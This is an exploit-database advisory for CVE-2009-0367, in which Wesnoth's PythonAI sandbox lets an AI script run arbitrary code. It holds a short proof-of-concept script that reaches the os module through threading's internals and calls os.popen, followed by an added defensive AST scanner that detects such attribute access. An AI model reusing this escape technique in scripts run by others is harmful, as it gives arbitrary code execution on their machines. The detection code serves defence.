Wesnoth 1.x - PythonAI Remote Code Execution

Author: Wesnoth
type: remote
platform: linux
date_added: 2009-02-25 
date_updated: 2014-04-13 
verified: 1 
codes: CVE-2009-0367;OSVDB-53877 

source: https://www.securityfocus.com/bid/33971/info

Wesnoth is prone to a remote code-execution vulnerability caused by a design error.

Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.

Versions prior to Wesnoth 1.5.11 are affected.

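#!WPY
import threading
# Reach the os module through threading's internal reference to sys
# (sys.modules) rather than importing os directly.
os = threading._sys.modules['os']
# Run an external command as the user running Wesnoth.
f = os.popen("firefox 'http://www.example.com'")
f.close()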
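
For reviewers of untrusted AI scripts, the following added example (not part of the original advisory and not Wesnoth code) shows why a check on import statements alone accepts the script above, while a scan of attribute access flags it. The whitelist contents, the attribute list and the function names are assumptions made for illustration.

```python
import ast

# Assumption: a sandbox that only whitelists top-level imports (names are illustrative).
ALLOWED_IMPORTS = {"threading", "math", "random"}
# Attribute names that reach interpreter internals from an allowed module.
RISKY_ATTRS = {"modules", "__dict__", "__globals__", "__builtins__", "__import__"}

# The script from this page, embedded as sample input.
SAMPLE = '''#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()
'''

def import_whitelist_ok(source):
    """Naive check: every imported top-level module is on the whitelist."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        if any(n.split(".")[0] not in ALLOWED_IMPORTS for n in names):
            return False
    return True

def risky_attribute_findings(source):
    """Flag private/dunder or known-internal attribute access, with line numbers."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute):
            if node.attr.startswith("_") or node.attr in RISKY_ATTRS:
                findings.append((node.lineno, node.attr))
    return sorted(findings)

if __name__ == "__main__":
    print("import whitelist passes:", import_whitelist_ok(SAMPLE))
    for lineno, attr in risky_attribute_findings(SAMPLE):
        print("line %d: access to .%s" % (lineno, attr))
```

A static check like this is a triage aid, not a containment boundary; untrusted scripts still need process-level isolation.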